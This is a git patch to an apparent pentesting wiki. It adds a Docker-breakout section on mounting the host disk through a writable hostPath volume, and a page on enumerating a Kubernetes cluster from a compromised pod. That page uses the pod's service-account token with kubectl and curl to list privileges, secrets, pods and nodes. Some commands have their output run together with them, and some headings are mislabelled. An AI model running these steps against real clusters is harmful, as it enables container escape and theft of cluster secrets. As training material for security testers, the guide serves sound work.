From 9d55f280641dae9e6a80de8e0801dbb43501933f Mon Sep 17 00:00:00 2001 From: CPol Date: Tue, 27 Apr 2021 23:18:16 +0000 Subject: [PATCH] GitBook: [master] 5 pages modified --- SUMMARY.md | 3 +- .../privilege-escalation/docker-breakout.md | 18 +++ .../README.md} | 21 ++- .../enumeration-from-a-pod.md | 125 ++++++++++++++++++ 4 files changed, 154 insertions(+), 13 deletions(-) rename pentesting/{pentesting-kubernetes.md => pentesting-kubernetes/README.md} (99%) create mode 100644 pentesting/pentesting-kubernetes/enumeration-from-a-pod.md diff --git a/SUMMARY.md b/SUMMARY.md index 46bc363d..ab0ca18e 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -170,7 +170,8 @@ * [Print Job Retention](pentesting/pentesting-printers/print-job-retention.md) * [Scanner and Fax](pentesting/pentesting-printers/scanner-and-fax.md) * [Pentesting SAP](pentesting/pentesting-sap.md) -* [Pentesting Kubernetes](pentesting/pentesting-kubernetes.md) +* [Pentesting Kubernetes](pentesting/pentesting-kubernetes/README.md) + * [Enumeration from a Pod](pentesting/pentesting-kubernetes/enumeration-from-a-pod.md) * [7/tcp/udp - Pentesting Echo](pentesting/7-tcp-udp-pentesting-echo.md) * [21 - Pentesting FTP](pentesting/pentesting-ftp/README.md) * [FTP Bounce attack - Scan](pentesting/pentesting-ftp/ftp-bounce-attack.md) diff --git a/linux-unix/privilege-escalation/docker-breakout.md b/linux-unix/privilege-escalation/docker-breakout.md index b0308fd8..a46f1560 100644 --- a/linux-unix/privilege-escalation/docker-breakout.md +++ b/linux-unix/privilege-escalation/docker-breakout.md @@ -470,6 +470,24 @@ capsh --print #You can abuse the SYS_MODULE capability ``` +## Writable hostPath Mount + +\(Info from [**here**](https://medium.com/swlh/kubernetes-attack-path-part-2-post-initial-access-1e27aabda36d)\) Within the container, an attacker may attempt to gain further access to the underlying host OS via a writable hostPath volume created by the cluster. Below is some common things you can check within the container to see if you leverage this attacker vector: + +```bash +#### Check if You Can Write to a File-system +$ echo 1 > /proc/sysrq-trigger + +#### Check root UUID +$ cat /proc/cmdlineBOOT_IMAGE=/boot/vmlinuz-4.4.0-197-generic root=UUID=b2e62f4f-d338-470e-9ae7-4fc0e014858c ro console=tty1 console=ttyS0 earlyprintk=ttyS0 rootdelay=300- Check Underlying Host Filesystem +$ findfs UUID=/dev/sda1- Attempt to Mount the Host's Filesystem +$ mkdir /mnt-test +$ mount /dev/sda1 /mnt-testmount: /mnt: permission denied. ---> Failed! but if not, you may have access to the underlying host OS file-system now. + +#### debugfs (Interactive File System Debugger) +$ debugfs /dev/sda1 +``` + ## Seccomp in Docker This is not a technique to breakout from a Docker container but a security feature that Docker uses and you should know about as it might prevent you from breaking out from docker: diff --git a/pentesting/pentesting-kubernetes.md b/pentesting/pentesting-kubernetes/README.md similarity index 99% rename from pentesting/pentesting-kubernetes.md rename to pentesting/pentesting-kubernetes/README.md index e4e53981..2614725c 100644 --- a/pentesting/pentesting-kubernetes.md +++ b/pentesting/pentesting-kubernetes/README.md @@ -29,7 +29,7 @@ Security tips for Kubernetes * **Pod**: Wrapper around a container or multiple containers with. A pod should only contain one application \(so usually, a pod run just 1 container\). The pod is the way kubernetes abstracts the container technology running. * **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** \(with a different internal IP\) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service. When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints` -![](../.gitbook/assets/image%20%28466%29.png) +![](../../.gitbook/assets/image%20%28466%29.png) * **Kubelet**: Primary node agent. The component that establishes communication between node and kubectl, and only can run pods \(through API server\). The kubelet doesn’t manage containers that were not created by Kubernetes. * **Kube-proxy**: is the service in charge of the communications \(services\) between the apiserver and the node. The base is an IPtables for nodes. Most experienced users could install other kube-proxies from other vendors. @@ -155,7 +155,7 @@ kubectl apply -f deployment.yml Each configuration file has 3 parts: **metadata**, **specification** \(what need to be launch\), **status** \(desired state\). Inside the specification of the deployment configuration file you can find the template defined with a new configuration structure defining the image to run: -![](../.gitbook/assets/image%20%28458%29.png) +![](../../.gitbook/assets/image%20%28458%29.png) #### Example of Deployment + Service declared in the same configuration file \(from [here](https://gitlab.com/nanuchi/youtube-tutorial-series/-/blob/master/demo-kubernetes-components/mongo.yaml)\) @@ -346,10 +346,14 @@ helm search Helm is also a template engine that allows to generate config files with variables: -![](../.gitbook/assets/image%20%28465%29.png) +![](../../.gitbook/assets/image%20%28465%29.png) ## PART 2 - VULNERABILITIES and some fixes. +### Enumeration inside a Pod + +{% page-ref page="enumeration-from-a-pod.md" %} + ### Vulnerabilities - kubernetes secrets A Secret is an object that contains sensitive data such as a password, a token or a key. Such information might otherwise be put in a Pod specification or in an image. Users can create Secrets and the system also creates Secrets. The name of a Secret object must be a valid **DNS subdomain name**. @@ -632,7 +636,7 @@ kubectl get secret test-secret -oyaml Do not forget to delete de secrets and re-create them again in order to apply the encryption layer. -### Final tips: +#### Final tips: * Try not to keep secrets in the FS, get them from other places. * Check out [https://www.vaultproject.io/](https://www.vaultproject.io/) for add more protection to your secrets. @@ -656,14 +660,7 @@ kubectl exec pod -it -- bash Once inside the container: ```text -root@pod01:/# uname -r -``` - -If you want to gather information you could use: - -```text -strace uname -r -ltrace uname -r +uname -r ``` When the attack achieves discovering the kernel version, he could run exploiting techniques to gather information or escalate into the OS. diff --git a/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md b/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md new file mode 100644 index 00000000..3330ff5a --- /dev/null +++ b/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md @@ -0,0 +1,125 @@ +# Enumeration from a Pod + +## Enumeration + +In a situation where you have managed to break into a Kubernetes Pod you could start enumerating the kubernetes environment from within. + +Usually in the directory `/run/secrets/kubernetes.io/serviceaccount` or `/var/run/secrets/kubernetes.io/serviceaccount` you can find the files: + +* **ca.crt**: It's the ca certificate to check kubernetes communications +* **namespace**: It indicates the current namespace +* **token**: It contains the auth token of the current pod. + +To enumerate the environment you can upload the [**kubectl**](https://kubernetes.io/es/docs/tasks/tools/install-kubectl/) binary and use it. Also, using the **token** obtained before you can manually access some endpoints of the **API Server**. +In order to find the the IP of the API service check the environment for a variable called `KUBERNETES_SERVICE_HOST`. + +### Get namespaces + +{% tabs %} +{% tab title="kubectl" %} +```bash +./kubectl get namespaces +``` +{% endtab %} + +{% tab title="API" %} +```bash +curl -v -H "Authorization: Bearer " \ +https://:/api/v1/namespaces/ +``` +{% endtab %} +{% endtabs %} + +### Get Current Privileges + +{% tabs %} +{% tab title="kubectl" %} +```bash +./kubectl auth can-i --list #Get privileges in current namespace +./kubectl auth can-i --list -n custnamespace #Get privileves in custnamespace +``` +{% endtab %} +{% endtabs %} + +### Get secrets + +{% tabs %} +{% tab title="kubectl" %} +```text +./kubectl get secrets +./kubectl get secrets -n custnamespace +``` +{% endtab %} + +{% tab title="API" %} +```bash +curl -v -H "Authorization: Bearer " \ +https://:/api/v1/namespaces/default/secrets/ + +curl -v -H "Authorization: Bearer " \ +https://:/api/v1/namespaces/custnamespace/secrets/ +``` +{% endtab %} +{% endtabs %} + +### Get deployments + +{% tabs %} +{% tab title="kubectl" %} +```text +./kubectl get deployments +./kubectl get deployments -n custnamespace +``` +{% endtab %} + +{% tab title="API" %} +```bash +curl -v -H "Authorization: Bearer " \ +https://:/api/v1/namespaces/default/deployments/ + +curl -v -H "Authorization: Bearer " \ +https://:/api/v1/namespaces/custnamespace/deployments/ +``` +{% endtab %} +{% endtabs %} + +### Get deployments + +{% tabs %} +{% tab title="kubectl" %} +```text +./kubectl get pods +./kubectl get pods -n custnamespace +``` +{% endtab %} + +{% tab title="API" %} +```bash +curl -v -H "Authorization: Bearer " \ +https://:/api/v1/namespaces/default/pods/ + +curl -v -H "Authorization: Bearer " \ +https://:/api/v1/namespaces/custnamespace/pods/ +``` +{% endtab %} +{% endtabs %} + +### Get deployments + +{% tabs %} +{% tab title="kubectl" %} +```text +./kubectl get nodes +``` +{% endtab %} + +{% tab title="API" %} +```bash +curl -v -H "Authorization: Bearer " \ +https://:/api/v1/nodes/ +``` +{% endtab %} +{% endtabs %} + + +